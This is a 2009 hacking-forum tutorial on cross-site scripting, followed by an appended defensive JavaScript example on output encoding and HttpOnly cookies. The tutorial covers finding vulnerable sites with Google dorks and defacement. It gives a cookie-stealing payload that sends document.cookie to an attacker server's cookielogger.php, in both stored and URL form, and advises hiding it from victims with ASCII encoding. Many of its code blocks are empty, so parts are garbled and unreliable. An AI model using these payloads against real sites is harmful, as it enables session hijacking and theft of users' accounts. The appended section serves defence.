[TUT] Cross Site Scripting (XSS) Walkthrough
11-24-2009, 04:33 PM (This post was last modified: 11-24-2009 04:39 PM by #DataBase.) Post: #1
Content:
Code:
- What is XSS?

What is Cross Site Scripting (XSS)?

Cross Site Scripting allows you to insert a malicious code into a web application (almost with a javascript code, but it is also possible to insert other codes like PHP or HTML). It is a vulnerability which is on almost every website you can find on the WWW. In addition I will talk about 2 different ways to use XSS...

1. The attacker will include a code into a URL. The XSS will not stay on the page.
2. The attacker will be able to insert a code and it will stay on the website. Usually the attacker will choose a website with some "input fields", like shoutboxes, blogs and guestbooks.

Finding XSS vulnerabilities

1. Visit http://www.google.com
2. Use "google dorks", like search.php?q=
3. Found the "right" website to inject it.

The Basics of XSS

A commonly used Cross Site Scripting injection is the following javascript code:

Code:

If you execute it, it will pop up a message box which will say "something". Soooo, if you have found a vuln website you could test if it is vuln to XSS. Just look:

Code:
http://database.delete.com/search.php?q=

That was an example of a javascript based XSS. But as I told you before, javascript isn't the only type of code you could use to execute an XSS. Here is an example of an HTML injection:

Code:

Will look like:

Code:
http://database.delete.com/search.php?q=

You should see a bold text on the page, if the page is vulnerable to XSS.

Defacement with XSS

To deface a website with Cross Site Scripting (XSS) you could use the following codes:

Code:

Code:

Code:

Code:

Stealing Cookies using XSS

The most used method of XSS is the cookie stealing. First get a cookielogger.php (will attach it!)

Okay, now we have the cookielogger.php. Upload it to your server and also create a log.txt where your logs will be stored. Make sure that it works! Search a vuln website and insert the following code: (replace it with your information)

Code:
document.location = "http://myserver.com/cookielogger.php?c="+document.cookie

Now, if the user visits the website his cookies will be stolen and sent to your cookielogger. Analyze the logger for his cookies and hijack his session.

But what if the website doesn't have such a store function? See...

Code:
http://website.com/search.php?q=document.location = "http://myserver.com/cookielogger.php?c="+document.cookie

You will redirect the original website to your server. (you should "crypt" the URL string, because your victim could notice the malicious code included in the original URL)

But how to "crypt" this code to become "normal", so that your victim doesn't notice the redirect to your server? Easy...all you need is a String to ASCII Converter and the function char() ( http://www.easycalculation.com/ascii-hex.php )

Okay, now pick your javascript code and convert it to ASCII. Example:

Code:

is equal to

Code:
60 115 99 114 105 112 116 62 97 108 101 114 116 40 34 69 120 97 109 112 108 101 34 41 60 47 115 99 114 105 112 116 62

Now, your browser could only read the code if there is a comma between the digits. Like this:

Code:
60,115,99,114,105, [...]

Finished! You crypted your malicious code to a "hidden" malicious code :D!

Bypassing Filters

But what could we do, if a webadmin has blocked some characters? Hm, we need to find another method...just write the code in a different way.

Code:
would be

Code:
')alert("Example");

Code:
')alert('Example');

Code:
")alert("Example");

Yeeeeeah, that is it. If you have any criticism or comments on my tutorial, please write a PM or just write into this thread.

ALL CREDITS GO TO #DataBase from http://www.hackforums.net
COPYING ONLY ALLOWED IF CREDITS ARE GIVEN TO ME!
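Added example, not part of the original post: what a site owner does about the search.php?q= case above. It renders the same two test inputs the tutorial describes (the alert box and the bold text) through an unescaped page, a blacklist filter, and output encoding, and builds response headers that keep a session cookie away from document.cookie. All function names, the cookie name sid and the CSP value are assumptions made for the illustration.

```javascript
// Added example: constructed search-page renderer, not code from the original post.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode every character that can open a tag, attribute value or entity.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable form: the q parameter is concatenated into the page as-is.
function renderUnsafe(q) {
  return `<p>Results for: ${q}</p>`;
}

// Weak fix: a blacklist that only strips <script> tags.
function renderBlacklist(q) {
  return `<p>Results for: ${String(q).replace(/<\/?script[^>]*>/gi, '')}</p>`;
}

// Hardened form: encode on output for the HTML body context.
function renderSafe(q) {
  return `<p>Results for: ${escapeHtml(q)}</p>`;
}

// Response headers for the hardened page (hypothetical helper and cookie name).
function hardenedHeaders(sessionId) {
  return {
    'Content-Type': 'text/html; charset=utf-8',
    'Content-Security-Policy': "default-src 'self'; script-src 'self'",
    // HttpOnly hides the cookie from document.cookie in page scripts.
    'Set-Cookie': `sid=${sessionId}; HttpOnly; Secure; SameSite=Lax; Path=/`,
  };
}

// Count tags from user input that survived into the page as real markup.
function injectedTags(html) {
  const inner = html.slice('<p>Results for: '.length, -'</p>'.length);
  return (inner.match(/<[a-z/][^>]*>/gi) || []).length;
}

// Constructed sample inputs: the alert test and the bold-text test.
const samples = ['<script>alert("Example")</script>', '<b>test</b>'];
for (const q of samples) {
  console.log(q, injectedTags(renderUnsafe(q)),
    injectedTags(renderBlacklist(q)), injectedTags(renderSafe(q)));
}
```

The blacklist removes the script tag but still lets the bold-text markup through, which is why encoding on output is the fix rather than blocking characters.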